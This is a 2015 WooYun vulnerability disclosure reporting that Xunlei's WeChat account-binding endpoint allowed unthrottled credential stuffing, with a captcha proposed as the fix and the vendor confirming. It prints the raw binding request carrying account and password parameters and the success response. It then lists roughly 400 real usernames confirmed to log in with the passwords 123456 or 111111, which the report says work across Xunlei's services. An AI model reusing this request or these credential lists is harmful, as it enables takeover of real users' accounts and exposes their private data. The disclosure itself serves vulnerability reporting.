当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0142964

漏洞标题:迅雷某客户服务系统存在缺陷可导致成功登陆大量用户账号(分分钟成功数百个)

相关厂商:迅雷

漏洞作者: Martial

提交时间:2015-09-23 14:07

修复时间:2015-11-07 15:02

公开时间:2015-11-07 15:02

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-23: 细节已通知厂商并且等待厂商处理中
2015-09-23: 厂商已经确认,细节仅向厂商公开
2015-10-03: 细节向核心白帽子及相关领域专家公开
2015-10-13: 细节向普通白帽子公开
2015-10-23: 细节向实习白帽子公开
2015-11-07: 细节向公众公开

简要描述:

大量用户账号(分分钟成功数百个)

详细说明:

微信端 关注 迅雷客户服务
然后点击我 点击绑定链接
http://act.vip.xunlei.com/waplogin/login.html?url=http%3A%2F%2Fjifen.xunlei.com%2Fweixinservice%2Fexchanges%2F
抓到该处

GET /kfweixin/server.php?type=toBind&openId=orWeAjsn10Nin0w0vq7wPgbfbrrE&createTime=1442980310&sign=ce4abe537b8f2b1646ed6b4aadfea203&account=wangjianhua&password=123456&timestamp=1442980329252&callback=jsonp2 HTTP/1.1
Host: dyactive.vip.xunlei.com
Referer: http://act.vip.xunlei.com/kfweixin/?openId=orWeAjsn10Nin0w0vq7wPgbfbrrE&createTime=1442980310&sign=ce4abe537b8f2b1646ed6b4aadfea203
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: zh-cn
Connection: close
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12H143 MicroMessenger/6.2.4 NetType/WIFI Language/zh_CN


account用常用用户名+123456
burp撞库测试
返回值为
jsonp2({"rtn":0,"msg":"\u7ed1\u5b9a\u6210\u529f\uff01"});
表示成功

1.jpg


下面全是密码为123456的 将近300个账号

wangjianhua
wangjianping
dulei
wangxiaoyan
majie
zhangmei
lidandan
chenhaiyan
zhangdandan
yangna
zhangzhiwei
lile
zhangxiaohong
liuhongmei
lilingling
zhoujianjun
xujianhua
zhaojia
wangxiaoyan
zhangchunmei
zhangshengli
wangjianzhong
zhanglijun
zhangxiaohong
wangyajun
chenchun
malina
zhanglijun
wangwenhua
wangyingying
weina
fangchao
wangxiaoyan
zhangyulan
zhangxiaoxia
zhaokun
wangzhiping
zhangjianqiang
wangjianzhong
wangyuanyuan
lidongsheng
zhanglijun
wangyanling
wangxiulan
zhouqiong
zhaojianping
wangfeifei
dulei
yumin
wangxiangyang
zhouxue
sunlili
liufangfang
liangmin
wangan
xueyong
wuguoqiang
dulei
zhaoqun
mengchao
zhoumi
dutao
yumin
majie
xuegang
liujianzhong
lilinlin
zhangyongping
zhangnana
wangminghua
lihuanhuan
wangchunhong
zhangxiaobing
liliping
yedan
yangjunjie
chenhaixia
zhuxiaoyan
lijinfeng
yanglixin
lubo
zhangyingchun
wangfeifei
wangyanxia
zhangmiaomiao
zhangzhijie
chenguoliang
wangxiufang
wangronghua
yangwu
chenda
zhangxiuzhen
dujing
wangguifang
jinmin
chenweiguo
heyun
wangyongliang
zhangchunyu
chenminghua
lixiufang
wangdongming
luojia
hanhua
dulei
liuyanling
wangshuguang
zhaozhiwei
xujianhua
lubo
yaojia
liuguiying
hanzhiqiang
guoxiang
liuyadong
yangxiuying
wangchangjiang
zhangzhiwen
cuijun
huanghong
chenjinsong
maxiaoyan
zhangchuang
sunlingling
zhoulihua
chenyonghua
wangxiaoying
suqiang
wuzhenhua
wangxiaoning
wangxiaoying
zhangxiuling
lixiansheng
xuxiaoyan
zhangwenwen
wangwenzhong
dongna
linlong
zhaolihua
zhangmei
liguifang
yanmin
liuminghua
lujia
zhangweifeng
liuxiaofang
zhangbowen
zhanghailei
wangxinping
zhanghongxing
lishuangshuang
liujianzhong
renfang
caoling
wangzhirong
leigang
zhangmeiying
sunlili
xujunjie
yefang
caojianguo
wangchunlan
lubo
zhuhongxia
liweiming
wangjunying
zhangan
lilinlin
lujia
xieleilei
wangchunying
chendongdong
gaochen
huhong
wangweixing
lixuefei
liyongmei
huangxudong
huangxiaofeng
wangce
songhaiyan
chenyanping
shenjianping
zhuguoqing
chenzhiwen
xuxiaoyan
zhouxiaohong
zhangruifang
liguoying
chenyanhua
lishulin
huangshaohua
wangjianping
zhengjianping
hushanshan
zhuxiaoyan
zhangchunguang
zhangchunhui
wangleijun
chenyanhua
wangxiaoyan
yangjunfeng
chengdan
luojianhua
huanghong
zhangmingjie
zhangyongzhong
jiangjianjun
wangxiangyu
huanghailong
mahaijun
wangxinming
wangjinliang
zhaozhiguo
chenxiulan
huangjianzhong
wangsuzhen
linjianping
zhangsongtao
dingjianguo
chenzhonghua
hanzhigang
liucaiyun
zhouxiaohong
liushufang
wangyuanyuan
wangxingxing
majie
zhangxiaoxue
wangdongfang
zhangchunlan
tianyan
yangweiwei
liuxiaofang
guoliping
liwenxia
dongzhigang
yangmeiling
zhangzhenzhen
liulifang
yangwenjing
zhangjinhai
zhuxinhua
lijinsheng
yangaijun
liruihua
lixinming
guolingling
zhulinlin
chenguoxiang
chenzhonghua
tianyan
chenxiaoliang
wangfujun
wangyongqing
zhangxinjun
wangguosheng
liujianlin
liuxiaolan
lujia
lilifang


然后有用密码111111测试 成功了100左右

gaoyang
xujin
zhangjianwei
liucheng
chenjianping
liuhaifeng
zhaochao
gaoyang
gaoyang
chenweidong
huangjianhua
zhouqing
xuna
lixudong
zhangchunhua
yuqiang
gaoyang
lixiaoling
wangyunlong
xujingjing
sunyun
lilihua
zhouqing
yanghu
zhangweiping
wangpan
lixiaoling
zhangge
fengxue
zhouhuan
liucheng
luofang
zhujunjie
wangpan
houlei
lishun
lixinmin
zhouqing
hanshuai
chenxuefeng
liuwenming
zhanghongliang
zhanghongliang
yuqiang
liyongliang
luying
fangyi
xuna
liyuqin
wangyongfeng
yangsheng
pengling
lishuying
gaojia
lishuguang
zhukun
zhouwenjie
zhangweiping
lixinjian
zhangguoming
zhaolinlin
lixingxing
luying
chengxu
fengping
liucheng
houlei
xujingjing
luhong
chenxiaowei
chenyuying
yanjie
jinfei
chenguomin
yanghaiying
zhangchunhua
jiyong
zhanghuiling
chenyongliang
wangshijun
zhengzhigang
maoyong
licuiping


看下微信端的显示

1.jpg


2.jpg


3.jpg


漏洞证明:

该帐号密码是迅雷全网通用的

4.jpg

修复方案:

验证码机制

版权声明:转载请注明来源 Martial@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-09-23 15:00

厂商回复:

感谢反馈~

最新状态:

暂无